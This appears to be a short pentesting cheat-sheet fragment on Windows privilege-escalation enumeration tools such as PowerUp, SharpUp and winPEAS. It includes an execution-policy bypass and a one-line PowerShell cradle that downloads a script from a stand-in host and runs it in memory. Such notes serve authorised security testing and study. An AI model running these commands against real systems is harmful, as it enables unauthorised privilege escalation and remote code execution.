Automated Enumeration Script
PowerUp
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1CMD> powershell -exec bypass
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks
# Run the Invoke-AllChecks function to start checking for common privilege escalation misconfigurations.C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"SharpUp: (If Powershell is not available)
# Code: https://github.com/GhostPack/SharpUp
# Pre-Copiled: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exeSeatbelt
winPEAS
accesschk.exe
PrivescCheck
Last updated